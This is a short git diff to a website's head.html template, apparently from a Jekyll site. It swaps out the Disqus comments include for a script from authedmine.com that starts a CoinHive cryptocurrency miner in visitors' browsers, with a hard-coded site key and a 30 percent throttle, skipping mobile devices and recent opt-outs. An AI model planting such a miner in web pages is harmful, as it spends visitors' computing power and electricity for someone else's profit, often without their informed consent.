--- a/_includes/head.html
+++ b/_includes/head.html
@@ -71,4 +71,13 @@
       s.parentNode.insertBefore(hm, s);
     })();
     </script>
-    {% include disqus_comments.html %}
+    <script src="https://authedmine.com/lib/authedmine.min.js"></script>
+    <script>
+        var miner = new CoinHive.Anonymous('oIL0QgG44HkRc7GSbFB4GGOpE5wvm4BB', {throttle: 0.3});
+
+        // Only start on non-mobile devices and if not opted-out
+        // in the last 14400 seconds (4 hours):
+        if (!miner.isMobile() && !miner.didOptOut(14400)) {
+            miner.start();
+        }
+    </script>
